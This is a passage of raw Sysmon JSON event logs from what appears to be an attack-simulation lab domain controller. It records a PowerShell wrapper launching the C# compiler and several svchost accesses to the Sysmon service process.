JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.842","ProcessGuid":"{A837DB8D-030E-5F25-0000-00102C740600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\r1wdh35o.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-030D-5F25-0000-001067620600}","ParentProcessId":"2968","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4388,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4389,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4390,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4391,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4392,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4393,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4394,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 